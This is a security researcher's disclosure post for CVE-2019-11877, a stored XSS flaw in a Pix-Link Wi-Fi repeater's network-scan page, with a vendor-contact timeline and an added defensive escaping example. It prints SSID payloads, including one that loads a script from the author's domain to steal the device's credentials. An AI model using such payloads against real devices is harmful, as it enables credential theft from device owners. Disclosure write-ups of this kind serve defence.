[CVE-2019-11877] Credentials Stealing Through XSS on Pix-Link Repeater

I needed a Wi-Fi repeater for my house and bought a Pix-Link LV-WR09 because it was one of the cheapest. I thought “What could go wrong with that?”

When I opened the repeater's configuration page, I noticed that the network listing function could be vulnerable to a Cross-Site Scripting attack via a Wi-Fi network with a malicious BSSID.


I used my smartphone to create a wifi network named

<script>alert('XSS')</script>

And did the test:

Yes! It's vulnerable!!

Now it’s time to make a real attack.

The SSID is limited to a maximum of 32 characters, so I registered a short enough domain:

http://ilrg.xyz/

I changed the SSID on my smartphone to <script src=//ilrg.xyz></script> and put my script in the index.html:

Now I just need to go to the settings page of the repeater and scan for available networks.

It will run the XSS and send the data to a file on my server.
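A defender-side illustration of the bug and its fix, added here and not part of the original post: the vulnerable renderer concatenates each scanned SSID straight into the page, while the hardened one escapes every attacker-controlled field and enforces the 32-byte SSID limit. The scan results and both render functions are constructed for this example; the repeater's real firmware code is not shown on the page.

```javascript
// Added example, not the repeater's own code. The scan results below are
// constructed to mirror the SSIDs used in the post; nothing is scanned here.

// Escape the five characters HTML interprets. An SSID is attacker-controlled
// text and must never reach the page as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// 802.11 limits an SSID to 32 octets; anything longer is malformed input
// and should be rejected rather than displayed.
function isValidSsidLength(ssid) {
  return Buffer.byteLength(ssid, 'utf8') <= 32;
}

// Vulnerable renderer: raw interpolation, so a network named
// <script>...</script> becomes live script in the admin's browser.
function renderScanVulnerable(networks) {
  return '<ul>' + networks.map((n) =>
    `<li>${n.ssid} (${n.bssid}) ${n.signal}%</li>`).join('') + '</ul>';
}

// Hardened renderer: over-long SSIDs are dropped, string fields are escaped,
// and the signal value is coerced to an integer so it cannot carry markup.
function renderScanSafe(networks) {
  return '<ul>' + networks
    .filter((n) => isValidSsidLength(n.ssid))
    .map((n) => `<li>${escapeHtml(n.ssid)} (${escapeHtml(n.bssid)}) ` +
                `${Number(n.signal) | 0}%</li>`)
    .join('') + '</ul>';
}

// Constructed scan result: a benign network plus the two SSIDs from the post.
// Note that "<script src=//ilrg.xyz></script>" is exactly 32 bytes, which is
// why the post needed such a short domain.
const SAMPLE_SCAN = [
  { ssid: 'HomeNet', bssid: '00:11:22:33:44:55', signal: 80 },
  { ssid: "<script>alert('XSS')</script>", bssid: '66:77:88:99:aa:bb', signal: 60 },
  { ssid: '<script src=//ilrg.xyz></script>', bssid: 'cc:dd:ee:ff:00:11', signal: 40 },
];

console.log(renderScanVulnerable(SAMPLE_SCAN)); // script tags survive intact
console.log(renderScanSafe(SAMPLE_SCAN));       // only &lt;script&gt; text remains
```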

It worked!

With this we have a POC!



28/04/2019 — First email sent to the vendor (no answer)

06/05/2019 — Second email sent to the vendor (no answer)

15/05/2019 — Third email sent to the vendor (no answer)

27/05/2019 — Disclosure
